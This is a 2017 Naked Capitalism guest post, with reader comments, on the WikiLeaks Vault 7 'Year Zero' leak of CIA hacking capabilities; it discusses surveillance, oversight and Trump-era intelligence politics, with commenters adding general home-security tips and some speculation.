"... The CIA's internal security is crap, too. Really a lot of people should be fired over that, as well as over Snowden's release. We didn't hear of it happening in the NSA, though I'm not sure we would have. Given Gaius's description of Trump's situation, it seems unlikely it will happen this time, either. One of my hopes for a Trump administration, as long as we're stuck with it, was a thorough cleanout of the upper echelons in the IC. It's obviously long overdue, and Obama wasn't up to it. But I used the past tense because I don't think it's going to happen. Trump seems more interested in sucking up to them, presumably so they won't kill him or his family. That being one of their options. ..."
"... "The CIA had created, in effect, its "own NSA" with even less accountability ." [My emphasis]. It seems to characterize an organization that operates outside of any control and oversight – and one that is intentionally structuring itself that way. That worries me. ..."
"... It's a dangerous world out there and only our brave IC can protect us from it. Come on. Stop blaming the victim and place the blame where it belongs–our IC and MIC. I say stop feeding the beast with your loyalty to a government that has ceased to be yours. ..."
"... "These CIA revelations in conjunction with those of the NSA paints a pretty dark future for privacy and freedom. Edward Snowden made us aware of the NSA's program XKEYSCORE and PRISM which are utilized to monitor and bulk collect information from virtually any electronic device on the planet and put it into a searchable database. Now Wikileaks has published what appears to be additional Big Brother techniques used by a competing agency. Say what you want about the method of discovery, but Pandora's box has been opened." ..."
Mar 09, 2017 | www.nakedcapitalism.com
March 9, 2017 by Yves Smith

Yves here. The first release of the Wikileaks Vault 7 trove has curiously gone from being a MSM lead story yesterday to a handwave today. On the one hand, anyone who was half awake during the Edward Snowden revelations knows that the NSA is in full spectrum surveillance and data storage mode, and members of the Five Eyes back-scratch each other to evade pesky domestic curbs on snooping. So the idea that the CIA (and presumably the NSA) found a way to circumvent encryption tools on smartphones, or are trying to figure out how to control cars remotely, should hardly come as a surprise.

However, at a minimum, reminding the generally complacent public that they are being spied on any time they use the Web, and increasingly the times in between, makes the officialdom Not Happy.

And if this Wikileaks claim is even halfway true, its Vault 7 publication is a big deal:

Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized "zero day" exploits, malware remote control systems and associated documentation. This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA. The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive.

This is an indictment of the model of having the intelligence services rely heavily on outside contractors. It is far more difficult to control information when you have multiple organizations involved. In addition, neoliberalism posits that workers are free agents who have no loyalties save to their own bottom lines (or for oddballs, their own sense of ethics). Let us not forget that Snowden planned his career job moves, which included a stint at NSA contractor Dell, before executing his information haul at a Booz Allen site that he had targeted.

Admittedly, there are no doubt many individuals who are very dedicated to the agencies for which they work and aspire to spend most if not all of their working lives there. But I would assume that they are a minority.

The reason outsiders can attempt to pooh-pooh the Wikileaks release is that the organization redacted sensitive information like the names of targets and attack machines. The CIA staffers who have access to the full versions of these documents as well as other major components in the hacking toolkit will be the ones who can judge how large and serious the breach really is. 1 And their incentives are to minimize it no matter what.

By Gaius Publius, a professional writer living on the West Coast of the United States and frequent contributor to DownWithTyranny, digby, Truthout, and Naked Capitalism. Follow him on Twitter @Gaius_Publius, Tumblr and Facebook. GP article archive here. Originally published at DownWithTyranny

CIA org chart from the WikiLeaks cache (click to enlarge). "The organizational chart corresponds to the material published by WikiLeaks so far. Since the organizational structure of the CIA below the level of Directorates is not public, the placement of the EDG [Engineering Development Group] and its branches is reconstructed from information contained in the documents released so far. It is intended to be used as a rough outline of the internal organization; please be aware that the reconstructed org chart is incomplete and that internal reorganizations occur frequently."

* * *

"O brave new world, that has such people in it."

Bottom line first. As you read what's below, consider:

Now the story.

WikiLeaks just dropped a huge cache of documents (the first of several promised releases), leaked from a person or people associated with the CIA in one or more capacities (examples, employee, contractor), which shows an agency out-of-control in its spying and hacking overreach. Read through to the end. If you're like me, you'll be stunned, not just about what they can do, but that they would want to do it, in some cases in direct violation of President Obama's orders. This story is bigger than anything you can imagine.

Consider this piece just an introduction, to make sure the story stays on your radar as it unfolds - and to help you identify those media figures who will try to minimize or bury it. (Unless I missed it, on MSNBC last night, for example, the first mention of this story was not Chris Hayes, not Maddow, but the Lawrence O'Donnell show, and then only to support his guest's "Russia gave us Trump" narrative. If anything, this leak suggests a much muddier picture, which I'll explore in a later piece.)

So I'll start with just a taste, a few of its many revelations, to give you, without too much time spent, the scope of the problem. Then I'll add some longer bullet-point detail, to indicate just how much of American life this revelation touches.

While the cache of documents has been vetted and redacted, it hasn't been fully explored for implications. I'll follow this story as bits and pieces are added from the crowd-sourced research done on the cache of information. If you wish to play along at home, the WikiLeaks torrent file is here. The torrent's passphrase is here. WikiLeaks press release is here (also reproduced below). Their FAQ is here.

Note that this release covers the years 2013–2016. As WikiLeaks says in its FAQ, "The series is the largest intelligence publication in history."

Preface - Trump and Our "Brave New World"

But first, this preface, consisting of one idea only. Donald Trump is deep in the world of spooks now, the world of spies, agents and operatives. He and his inner circle have a nest of friends, but an even larger, more varied nest of enemies. As John Sevigny writes below, his enemies include not only the intel and counter-intel people, but also "Republican lawmakers, journalists, the Clintons, the Bush family, Barack Obama, the ACLU, every living Democrat and even Rand Paul." Plus Vladimir Putin, whose relationship with Trump is just "business," an alliance of convenience, if you will.

I have zero sympathy for Donald Trump. But his world is now our world, and with both of his feet firmly planted in spook world, ours are too. He's in it to his neck, in fact, and what happens in that world will affect every one of us. He's so impossibly erratic, so impossibly unfit for his office, that everyone on the list above wants to remove him. Many of them are allied, but if they are, it's also only for convenience.

How do spooks remove the inconvenient and unfit? I leave that to your imagination; they have their ways. Whatever method they choose, however, it must be one without fingerprints - or more accurately, without their fingerprints - on it.

Which suggests two more questions. One, who will help them do it, take him down? Clearly, anyone and everyone on the list. Second, how do you bring down the president, using extra-electoral, extra-constitutional means, without bringing down the Republic? I have no answer for that.

Here's a brief look at "spook world" (my phrase, not the author's) from " The Fox Hunt " by John Sevigny:

Several times in my life – as a journalist and rambling, independent photographer - I've ended up rubbing shoulders with spooks. Long before that was a racist term, it was a catch-all to describe intelligence community people, counter intel types, and everyone working for or against them. I don't have any special insight into the current situation with Donald Trump and his battle with the IC as the intelligence community calls itself, but I can offer a few first hand observations about the labyrinth of shadows, light, reflections, paranoia, perceptions and misperceptions through which he finds himself wandering, blindly. More baffling and scary is the thought he may have no idea his ankles are already bound together in a cluster of quadruple gordian knots, the likes of which very few people ever escape.

Criminal underworlds, of which the Trump administration is just one, are terrifying and confusing places. They become far more complicated once they've been penetrated by authorities and faux-authorities who often represent competing interests, but are nearly always in it for themselves.

One big complication - and I've written about this before - is that you never know who's working for whom . Another problem is that the hierarchy of handlers, informants, assets and sources is never defined. People who believe, for example, they are CIA assets are really just being used by people who are perhaps not in the CIA at all but depend on controlling the dupe in question. It is very simple - and I have seen this happen - for the subject of an international investigation to claim that he is part of that operation. [emphasis added]

Which leads Sevigny to this observation about Trump, which I partially quoted above: "Donald Trump may be crazy, stupid, evil or all three but he knows the knives are being sharpened and there are now too many blades for him to count. The intel people are against him, as are the counter intel people. His phone conversations were almost certainly recorded by one organization or another, legal or quasi legal. His enemies include Republican lawmakers, journalists, the Clintons, the Bush family, Barack Obama, the ACLU, every living Democrat and even Rand Paul. Putin is not on his side - that's a business matter and not an alliance."

Again, this is not to defend Trump, or even to generate sympathy for him - I personally have none. It's to characterize where he is, and where we are, at this pivotal moment. Pivotal not for what they're doing, the broad intelligence community. But pivotal for what we're finding out, the extent and blatancy of the violations.

All of this creates an incredibly complex story, with only a tenth or less being covered by anything like the mainstream press. For example, the Trump-Putin tale is much more likely to be part of a much broader "international mobster" story, whose participants include not only Trump and Putin, but Wall Street (think HSBC) and major international banks, sovereign wealth funds, major hedge funds, venture capital (vulture capital) firms, international drug and other trafficking cartels, corrupt dictators and presidents around the world and much of the highest reaches of the "Davos crowd."

Much of the highest reaches of the .01 percent, in other words, all served, supported and "curated" by the various, often competing elements of the first-world military and intelligence communities. What a stew of competing and aligned interests, of marriages and divorces of convenience, all for the common currencies of money and power, all of them dealing in death .

What this new WikiLeaks revelation shows us is what just one arm of that community, the CIA, has been up to. Again, the breadth of the spying and hacking capability is beyond imagination. This is where we've come to as a nation.

What the CIA Is Up To - A Brief Sample

Now about those CIA spooks and their surprising capabilities. A number of other outlets have written up the story, but this from Zero Hedge has managed to capture the essence as well as the breadth in not too many words (emphasis mine throughout):

WikiLeaks has published what it claims is the largest ever release of confidential documents on the CIA. It includes more than 8,000 documents as part of 'Vault 7', a series of leaks on the agency, which have allegedly emerged from the CIA's Center For Cyber Intelligence in Langley, and which can be seen on the org chart below, which Wikileaks also released: [org chart reproduced above]

A total of 8,761 documents have been published as part of 'Year Zero', the first in a series of leaks the whistleblower organization has dubbed 'Vault 7.' WikiLeaks said that 'Year Zero' revealed details of the CIA's "global covert hacking program," including "weaponized exploits" used against company products including "Apple's iPhone, Google's Android and Microsoft's Windows and even Samsung TVs, which are turned into covert microphones."

WikiLeaks tweeted the leak, which it claims came from a network inside the CIA's Center for Cyber Intelligence in Langley, Virginia.

Among the more notable disclosures which, if confirmed, "would rock the technology world", the CIA had managed to bypass encryption on popular phone and messaging services such as Signal, WhatsApp and Telegram. According to the statement from WikiLeaks, government hackers can penetrate Android phones and collect "audio and message traffic before encryption is applied."

With respect to hacked devices like your smart phone, smart TV and computer, consider the concept of putting these devices in "fake-off" mode:

Among the various techniques profiled by WikiLeaks is "Weeping Angel", developed by the CIA's Embedded Devices Branch (EDB), which infests smart TVs , transforming them into covert microphones. After infestation, Weeping Angel places the target TV in a 'Fake-Off' mode , so that the owner falsely believes the TV is off when it is on. In 'Fake-Off' mode the TV operates as a bug, recording conversations in the room and sending them over the Internet to a covert CIA server.

As Kim Dotcom chimed in on Twitter, "CIA turns Smart TVs, iPhones, gaming consoles and many other consumer gadgets into open microphones" and added "CIA turned every Microsoft Windows PC in the world into spyware. Can activate backdoors on demand, including via Windows update "[.]

Do you still trust Windows Update?

About "Russia did it"

Adding to the "Russia did it" story, note this:

Another profound revelation is that the CIA can engage in "false flag" cyberattacks which portray Russia as the assailant . Discussing the CIA's Remote Devices Branch's UMBRAGE group, Wikileaks' source notes that it "collects and maintains a substantial library of attack techniques 'stolen' from malware produced in other states including the Russian Federation.["]

As Kim Dotcom summarizes this finding, "CIA uses techniques to make cyber attacks look like they originated from enemy state."

This doesn't prove that Russia didn't do it ("it" meaning actually hacking the presidency for Trump, as opposed to providing much influence in that direction), but again, we're in spook world, with all the phrase implies. The CIA can clearly put anyone's fingerprints on any weapon they wish, and I can't imagine they're alone in that capability.

Hacking Presidential Devices?

If I were a president, I'd be concerned about this, from the WikiLeaks "Analysis" portion of the Press Release (emphasis added):

"Year Zero" documents show that the CIA breached the Obama administration's commitments [that the intelligence community would reveal to device manufacturers whatever vulnerabilities it discovered]. Many of the vulnerabilities used in the CIA's cyber arsenal are pervasive [across devices and device types] and some may already have been found by rival intelligence agencies or cyber criminals.

As an example, specific CIA malware revealed in "Year Zero" [that it] is able to penetrate, infest and control both the Android phone and iPhone software that runs or has run presidential Twitter accounts . The CIA attacks this software by using undisclosed security vulnerabilities ("zero days") possessed by the CIA[,] but if the CIA can hack these phones then so can everyone else who has obtained or discovered the vulnerability. As long as the CIA keeps these vulnerabilities concealed from Apple and Google (who make the phones) they will not be fixed, and the phones will remain hackable.

Does or did the CIA do this (hack presidential devices), or is it just capable of it? The second paragraph implies the latter. That's a discussion for another day, but I can say now that both Lawrence Wilkerson, aide to Colin Powell and a non-partisan (though an admitted Republican) expert in these matters, and William Binney, one of the triumvirate of major pre-Snowden leakers, think emphatically yes. (See Wilkerson's comments here. See Binney's comments here.)

Whether or not you believe Wilkerson and Binney, do you doubt that if our intelligence people can do something, they would balk at the deed itself, in this world of "collect it all"? If nothing else, imagine the power this kind of bugging would confer on those who do it.

The Breadth of the CIA Cyber-Hacking Scheme

But there is so much more in this Wikileaks release than suggested by the brief summary above. Here's a bullet-point overview of what we've learned so far, again via Zero Hedge:

Key Highlights from the Vault 7 release so far:

Also this scary possibility:

Journalist Michael Hastings, who in 2010 destroyed the career of General Stanley McChrystal and was hated by the military for it, was killed in 2013 in an inexplicably out-of-control car. This isn't to suggest the CIA, specifically, caused his death. It's to ask that, if these capabilities existed in 2013, what would prevent their use by elements of the military, which is, after all a death-delivery organization?

And lest you consider this last speculation just crazy talk, Richard Clarke (that Richard Clarke) agrees: "Richard Clarke, the counterterrorism chief under both Bill Clinton and George W. Bush, told the Huffington Post that Hastings's crash looked consistent with a car cyber attack." Full and fascinating article here.

WikiLeaks Press Release

Here's what WikiLeaks itself says about this first document cache (again, emphasis mine):

Press Release

Today, Tuesday 7 March 2017, WikiLeaks begins its new series of leaks on the U.S. Central Intelligence Agency. Code-named "Vault 7" by WikiLeaks, it is the largest ever publication of confidential documents on the agency.

The first full part of the series, "Year Zero", comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA's Center for Cyber Intelligence in Langley, Virgina. It follows an introductory disclosure last month of CIA targeting French political parties and candidates in the lead up to the 2012 presidential election .

Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized "zero day" exploits, malware remote control systems and associated documentation. This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA. The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive.

"Year Zero" introduces the scope and direction of the CIA's global covert hacking program, its malware arsenal and dozens of "zero day" weaponized exploits against a wide range of U.S. and European company products, include Apple's iPhone, Google's Android and Microsoft's Windows and even Samsung TVs, which are turned into covert microphones.

Since 2001 the CIA has gained political and budgetary preeminence over the U.S. National Security Agency (NSA). The CIA found itself building not just its now infamous drone fleet, but a very different type of covert, globe-spanning force - its own substantial fleet of hackers. The agency's hacking division freed it from having to disclose its often controversial operations to the NSA (its primary bureaucratic rival) in order to draw on the NSA's hacking capacities.

By the end of 2016, the CIA's hacking division, which formally falls under the agency's Center for Cyber Intelligence (CCI), had over 5000 registered users and had produced more than a thousand hacking systems, trojans, viruses, and other "weaponized" malware. Such is the scale of the CIA's undertaking that by 2016, its hackers had utilized more code than that used to run Facebook. The CIA had created, in effect, its "own NSA" with even less accountability and without publicly answering the question as to whether such a massive budgetary spend on duplicating the capacities of a rival agency could be justified.

In a statement to WikiLeaks the source details policy questions that they say urgently need to be debated in public , including whether the CIA's hacking capabilities exceed its mandated powers and the problem of public oversight of the agency. The source wishes to initiate a public debate about the security, creation, use, proliferation and democratic control of cyberweapons.

Once a single cyber 'weapon' is 'loose' it can spread around the world in seconds, to be used by rival states, cyber mafia and teenage hackers alike.

Julian Assange, WikiLeaks editor stated that "There is an extreme proliferation risk in the development of cyber 'weapons'. Comparisons can be drawn between the uncontrolled proliferation of such 'weapons', which results from the inability to contain them combined with their high market value, and the global arms trade. But the significance of "Year Zero" goes well beyond the choice between cyberwar and cyberpeace. The disclosure is also exceptional from a political, legal and forensic perspective."

Wikileaks has carefully reviewed the "Year Zero" disclosure and published substantive CIA documentation while avoiding the distribution of 'armed' cyberweapons until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should analyzed, disarmed and published.

Wikileaks has also decided to redact and anonymise some identifying information in "Year Zero" for in depth analysis. These redactions include ten of thousands of CIA targets and attack machines throughout Latin America, Europe and the United States. While we are aware of the imperfect results of any approach chosen, we remain committed to our publishing model and note that the quantity of published pages in "Vault 7" part one ("Year Zero") already eclipses the total number of pages published over the first three years of the Edward Snowden NSA leaks.

Be sure to click through for the Analysis, Examples and FAQ sections as well.

"O brave new world," someone once wrote . Indeed. Brave new world, that only the brave can live in.

____

1 Mind you, the leakers may have had a comprehensive enough view to be making an accurate call. But the real point is there are no actors who will be allowed to make an independent assessment.

This entry was posted in Banana republic, Guest Post, Legal, Politics, Surveillance state, Technology and innovation on March 9, 2017 by Yves Smith.

64 comments

Code Name D , March 9, 2017 at 2:38 am

That's all I needed.
https://www.theguardian.com/us-news/2017/jan/10/fbi-chief-given-dossier-by-john-mccain-alleging-secret-trump-russia-contacts

Senator John McCain passed documents to the FBI director, James Comey, last month alleging secret contacts between the Trump campaign and Moscow and that Russian intelligence had personally compromising material on the president-elect himself.

The material, which has been seen by the Guardian, is a series of reports on Trump's relationship with Moscow. They were drawn up by a former western counter-intelligence official, now working as a private consultant. BuzzFeed on Tuesday published the documents, which it said were "unverified and potentially unverifiable".

The Guardian has not been able to confirm the veracity of the documents' contents,

Emphases mine. I had been sitting on this link trying to make sense of this part. Clearly, the Trump White House has some major leaks, which the MSM is exploiting. But the start of this article suggests that para-intelligence (is that a word? Eh, it is now) was the source of the allegedly damaging info.

This is no longer about the deep state, but a rogue state, possibly guns for hire, each having fealty to specific political interests. The CIA arsenal wasn't leaked. It was delivered.

salvo , March 9, 2017 at 3:13 am

hmm.. as far as I can see, no one seems to care here in Germany anymore about being spied on by our US friends, apart from a few alternative sources which are being accused of spreading fake news, of being anti-American, Russian trolls, the matter is widely ignored

visitor , March 9, 2017 at 3:40 am

I have read a few articles about the Vault 7 leak that typically raise a few alarms I would like to comment on.

1) The fact that the

CIA had managed to bypass encryption on popular phone and messaging services

does not mean that it has broken encryption, just that it has a way to install a program at a lower level, close to the operating system, that will read messages before they are encrypted and sent by the messaging app, or just after they have been decrypted by it.

As a side note: banks have now largely introduced two-factor authentication when accessing online services. One enters username (or account number) and password; the bank site returns a code; the user must then enter this code into a smartphone app or a tiny specialized device, which computes and returns a value out of it; the user enters this last value into the entry form as a throw-away additional password, and gains access to the bank website.

I have always refused to use such methods on a smartphone and insist on getting the specialized "single-use password computer", precisely because the smartphone platform can be subverted.

2) The fact that

"Weeping Angel", developed by the CIA's Embedded Devices Branch (EDB), [ ] infests smart TVs, transforming them into covert microphones.

is possible largely because smart TVs are designed by their manufacturers to serve as spying devices. "Weeping Angel" is not some kind of virus that turns normal devices into zombies, but a tool to take control of existing zombie devices.

The fact that smart TVs from Vizio, Samsung or LG constitute an outrageous intrusion into the privacy of their owners has been a known topic for years already.

3) The

CIA [ ] also looking at infecting the vehicle control systems used by modern cars and trucks

is not a "scary possibility" either; various demonstrations of such feats on Tesla , Nissan , or Chrysler vehicles have been demonstrated in the past few years.

And the consequences have already been suggested (killing people by disabling their car controls on the highway for instance).

My take on this is that we should seriously look askance not just at the shenanigans of the CIA, but at the entire "innovative technology" that is imposed upon (computerized cars) or joyfully adopted by (smartphones) consumers. Of course, most NC readers are aware of the pitfalls already, but alas not the majority of the population.

4) Finally this:

He's so impossibly erratic, so impossibly unfit for his office,

Trump is arguably unfit for office, does not have a clue about many things (such as foreign relations), but by taxing him with being "erratic" Gaius Publius shows that he still does not "get" the Donald.

Trump has a completely different modus operandi than career politicians, formed by his experience as a real-estate mogul and media star. His world has been one where one makes outrageous offers to try anchoring the negotiation before reducing one's claims - even significantly, or abruptly exiting just before an agreement to strike a deal with another party that has been lured to concessions through negotiations with the first one. NC once included a video of Trump doing an interactive A/B testing of his slogans during a campaign meeting; while changing one's slogans on the spot might seem "erratic", it is actually a very systematic market probing technique.

So stop asserting that Trump is "unpredictable" or "irrational"; this is underestimating him (a dangerous fault), as he is very consistent, though in an uncommon fashion amongst political pundits.

Yves Smith (Post author), March 9, 2017 at 5:53 am

While I agree that it's worth pointing out that the CIA has not broken any of the major encryption tools, even Snowden regards being able to circumvent them as worse, since people using encryption are presumably those who feel particularly at risk and will get a false sense of security and say things or keep data on their devices that they never would if they thought they were insecure.

Re Gaius on Trump, I agree the lady doth protest too much. But I said repeatedly that Trump would not want to be President if he understood the job. It is not like being the CEO of a private company. Trump has vastly more control over his smaller terrain in his past life than he does as President.

And Trump is no longer campaigning. No more a/b testing.

The fact is that he still does not have effective control of the Executive branch. He has lots of open positions in the political appointee slots (largely due to not having even submitted candidates!) plus has rebellion in some organizations (like folks in the EPA storing data outside the agency to prevent its destruction).

You cannot pretend that Trump's former MO is working at all well for him. And he isn't showing an ability to adapt or learn (not surprising at his age). For instance, he should have figured out by now that DC is run by lawyers, yet his team has hardly any on it. This is continuing to be a source of major self-inflicted wounds.

His erraticness may be keeping his opponents off base, but it is also keeping him from advancing any of his goals.

visitor , March 9, 2017 at 6:59 am

I believe we are in agreement.

Yes, not breaking encryption is devious, as it gives a false sense of security - this is precisely why I refuse to use those supposedly secure e-banking login apps on smartphones whose system software can be subverted, and prefer those non-connected, non-reprogrammable, special-purpose password generating devices.

As for Trump being incompetent for his job, and his skills in wheeling-dealing not carrying over usefully to conducting high political offices, that much is clear. But he is not "erratic", rather he is out of place and out of his depth.

RBHoughton , March 9, 2017 at 9:00 pm

I am writing this in the shower with a paper bag over my head and my iPhone in the microwave.

I have for years had a password-protected document on computer with all my important numbers and passwords. I have today deleted that document and reverted to a paper record.

Ivy , March 9, 2017 at 10:09 am

Please tell readers more about the following for our benefit:

"single-use password computer"

visitor , March 9, 2017 at 11:34 am

That is an example of the sort of thing I am talking about.

PhilM , March 9, 2017 at 11:35 am

I think he means a machine dedicated to high-security operations like anything financial or bill-pay. Something that is not exposed to email or web-browsing operations that happen on a casual-use computer that can easily be compromised. That's not a bad way to go; it's cheaper in terms of time than the labor-intensive approaches I use, but those are a hobby more than anything else. It depends on how much you have at stake if they get your bank account or brokerage service password.

I take a few basic security measures, which would not impress the IT crowd I hang out with elsewhere, but at least would not make me a laughingstock. I run Linux and use only open-source software; run ad-blockers and script blockers; confine risky operations, which means any non-corporate or non-mainstream website, to a virtual machine that is reset after each use; use separate browsers with different cookie storage policies and different accounts for different purposes. I keep a well-maintained pfSense router with a proxy server and an intrusion detection system, allowing me to segregate my secure network, home servers, guest networks, audiovisual streaming and entertainment devices, and IoT devices each on their own VLANs with appropriate ACLs between them. No device on the more-secured network is allowed out to any port without permission, and similar rules are there for the IoT devices, and the VoIP tools.

The hardware to do all of that costs at least $700, but the real expense is in the time to learn the systems properly. Of course if you use Linux, you could save that on software in a year if you are too cheap to send a contribution to the developers.

It's not perfect, because I still have computers turned on :) , but I feel a bit safer this way.

That said, absolutely nothing that I have here would last 30 milliseconds against anything the "hats" could use, if they wanted in. It would be over before it began. If I had anything to hide, really, I would have something to fear; so guess I'm OK.

jrs , March 9, 2017 at 2:36 pm

Open source software often has a lot of bugs to be exploited. Wouldn't it be easier to just do banking in person?

visitor , March 9, 2017 at 2:45 pm

Banks discourage that by

a) charging extortionate fees for "in-person" operations at the counter;

b) closing subsidiaries, thus making it tedious and time-consuming to visit a branch to perform banking operations in person;

c) eliminating the possibility to perform some or even all usual operations in any other form than online (see the advent of "Internet only" banks).

In theoretical terms, all this is called "nudging".

cfraenkel , March 9, 2017 at 12:07 pm

They're key fobs handed to you by your IT dept. The code displayed changes every couple of minutes. The plus is there's nothing sent over the air. The minus is the fobs are subject to theft, and are only good for connecting to 'home'. And since they have a cost, and need to be physically handed to you, they're not a good fit for most two factor login applications (i.e. logging into your bank account).

see https://en.wikipedia.org/wiki/RSA_SecurID

meme , March 9, 2017 at 3:53 am

I watched (fast forwarded through, really) Morning Joe yesterday to see what they would have to say about Wikileaks. The show mostly revolved around the health care bill and Trump's lying and tweeting about Obama wiretapping him. They gave Tim Kaine plenty of time to discuss his recent trip to London talking to "some of our allies there" saying that they are concerned that "all the intelligence agencies" say the Rooskies "cyber hacked" our election, and since it looks like we aren't doing anything when we are attacked, they KNOW we won't do anything when they are attacked. (more red baiting)

The only two mentions I saw about Wikileaks were, first, a question asked of David Cohen, ex Deputy Director of the CIA, who refused to confirm the Wikileaks were authentic, saying whatever tools and techniques the CIA had were used against foreign persons overseas, so there is no reason to worry that your TV is looking at you. And second, Senator Tom Cotton, who didn't want to comment on the contents of Wikileaks, only saying that the CIA is a foreign intelligence service, collecting evidence on foreign targets to keep our country safe, and it does not do intelligence work domestically.

So that appears to be their story, the CIA doesn't spy on us, and they are sticking with it, probably hoping the whole Wikileaks thing just cycles out of the news.

Direction , March 9, 2017 at 4:23 am

Thanks for mentioning Hastings. His death has always been more than suspicious.

skippy , March 9, 2017 at 5:46 am

Elite risk management reduction tool goes walkabout inverting its potential ..

disheveled. Love it when a plan comes together ..

james wordsworth , March 9, 2017 at 5:50 am

The unwillingness of the mainstream media (so far) to really cover the Wikileaks reveal is perhaps the bigger story. This should be ongoing front page stuff .. but it is not.

As for using ZeroHedge as a source for anything, can we give that a rest. That site has become a cesspool of insanity. It used to have some good stuff. Now it is just unreadable. SAD

And yes I know the hypocrisy of slamming ZH and the MSM at the same time. We live in interesting times.

Yves Smith (Post author), March 9, 2017 at 7:52 am

Your remarks on ZH are an ad hominem attack and therefore a violation of site policies. The onus is on you to say what ZH got wrong and not engage in an ungrounded smear. The mainstream media often cites ZH.

NC more than just about any other finance site is loath to link to ZH precisely because it is off base or hyperventilating a not acceptably high percent of the time, and is generally wrong about the Fed (as in governance and how money works). We don't want to encourage readers to see it as reliable. However, it is good on trader gossip and mining Bloomberg data.

And I read through its summary of the Wikileaks material as used by Gaius and there was nothing wrong with it. It was careful about attributing certain claims to Wikileaks as opposed to depicting them as true.

3urypteris , March 9, 2017 at 12:14 pm

My rules for reading ZH:
1- Skip every article with no picture
2- Skip every article where the picture is a graph
3- Skip every article where the picture is of a single person's face
4- Skip every article where the picture is a cartoon
5- Skip every article about gold, BitCoin, or high-frequency trading
6- Skip all the "Guest Posts"
7- ALWAYS click through to the source
8- NEVER read the comments

It is in my opinion a very high noise-to-signal source, but there is some there there.

sunny129 , March 9, 2017 at 7:20 pm

Finding the TRUTH is NOT that easy.

Discerning 'news from noise' is NEVER that easy b/c it is an art, developed by years of sifting through an ever increasing 'DATA information' load. This again has to be filtered and tested against one's own 'critical' thinking or reasoning! You have to give ZH deserved credit when they are right!

There is no longer a Black or white there, even at ZH! But it is one of the few, willing to challenge the main stream narrative 'kool aid'

TheCatSaid , March 9, 2017 at 6:14 am

In addition to the "para-intelligence" community (hat tip Code named D) there are multiple enterprises with unique areas of expertise that interface closely with the CIA. The long-exposed operations, which include entrapment and blackmailing of key actors to guarantee complicity, "loyalty" and/or sealed lips, infect businesses, NGOs, law enforcement agencies, judges, politicians, and other government agencies. Equal opportunity employment for those with strong stomachs and a weak moral compass.

Romancing The Loan , March 9, 2017 at 8:43 am

Yes I can't remember where I read it but it was a tale passed around supposedly by an FBI guy that had, along with his colleagues, the job of vetting candidates for political office. They'd do their background research and pass on either a thick or thin folder full of all the compromising dirt on each potential appointee. Over time he said he was perturbed to notice a persistent pattern where the thickest folders were always the ones who got in.

nobody , March 9, 2017 at 10:10 am

Michael Hudson:

I learned this when I was in my 20s. The Catholic Church was funding my early critique of American foreign aid as being imperialist. I asked whether they thought I should go into politics. They said, "No, you'd never make it". And I said, "Why?" and they said, "Well, nobody has a police record or any other dirt on you." I asked what they meant. They said, "Unless they have something over you to blackmail you with, you're not going to be able to get campaign funding. Because they believe that you might do something surprising," in other words, something they haven't asked you to do. So basically throughout politics, on both sides of the spectrum, voters have candidates who are funded by backers who have enough over them that they can always blackmail.

craazyboy , March 9, 2017 at 8:20 am

I find the notion that my consumer electronics may be CIA microphones somewhat irritating, but my imagination quickly runs off to far worse scenarios. (although the popular phrase, "Your tax dollars at work." keeps running thru my head like an earworm. And whenever I hear "conservatives" speak of their desire for "small government", usually when topics of health care, Medicare and social security come up, I can only manage a snort of incredulousness anymore)

One being malware penetrating our nuke power plants and shutting down the cooling system. Then the reactor slowly overheats over the next 3 days, goes critical, and blows the surrounding area to high heaven. We have plants all around the coast of the country and also around the Great Lakes Region – our largest fresh water store in a drought threatened future.

Then the same happening in our offensive nuke missile systems.

Some other inconvenient truths – the stuxnet virus has been redesigned. Kaspersky – premier anti malware software maker – had a variant on their corporate network for months before finally discovering it. What chance have we?

In China, hacking is becoming a consumer service industry. There are companies building high power data centers with a host of hacking tools. Anyone, including high school script kiddies, can rent time to use the sophisticated hacking tools, web search bots, and whatever, all hosted on powerful servers with high speed internet bandwidth.

Being a bit "spooked" by all this, I began to worry about my humble home computer and decided to research whatever products I could get to at least ward off annoying vandalism. Among other things, I did sign up for a VPN service. I'm looking at the control app for my VPN connection here and I see that with a simple checkbox mouse click I can make my IP address appear to be located in my choice of 40 some countries around the world. Romania is on the list!

flora , March 9, 2017 at 11:11 am

"my consumer electronics may be CIA microphones"

I haven't tested this, so can't confirm it works, but it sounds reasonable.
http://www.komando.com/tips/390304/secure-your-webcam-and-microphone-from-hackers

craazyboy , March 9, 2017 at 12:40 pm

Actually, I very much doubt that does work. The mic "pickup" would feed its analog output to a DAC (digital to analog converter) which would convert the signal to digital. This then goes to something similar to a virtual com port in the operating system. Here is where a malware program would pick it up and either create an audio file to be sent to an internet address, or stream it directly there.

The article is just plugging in a microphone at the output jack. The malware got the data long before it goes thru another DAC and analog amp to get to the speakers or output jack.

craazyboy , March 9, 2017 at 12:46 pm

s/b "plugging in an earbud at the output jack". They're confusing me too.

flora , March 9, 2017 at 2:43 pm

ah. thanks for vetting.

Stephen Gardner , March 9, 2017 at 2:53 pm

It's actually an input/output jack or, if you will, a mic/headphone jack.

Stephen Gardner , March 9, 2017 at 2:52 pm

It depends on how it is hooked up internally. Old fashioned amateur radio headphones would disable the speakers when plugged in because the physical insertion of the plug pushed open the connection to the speakers. The jack that you plug the ear buds into might do the same, disconnecting the path between the built-in microphone and the ADC (actually it is an ADC not a DAC). The only way to know is to take it apart and see how it is connected.

Pat , March 9, 2017 at 8:27 am

The CIA is not allowed to operate in the US is also the panacea for the public. And some are buying it. Along with everyone knows they can do this is fueling the NOTHING to see here keep walking weak practically non existent coverage.

Eureka Springs , March 9, 2017 at 8:31 am

At what point do people quit negotiating in terrorism and errorism? For this is what the police, the very State itself has long been. Far beyond being illegitimate, illegal, immoral, this is a clear and ever present danger to not just its own people, but the rule of law itself. Blanket statements like we all know this just make the dangerously absurd normal. I'll never understand that part of human nature. But hey, the TSA literally just keeps probing further each and every year. Bend over!

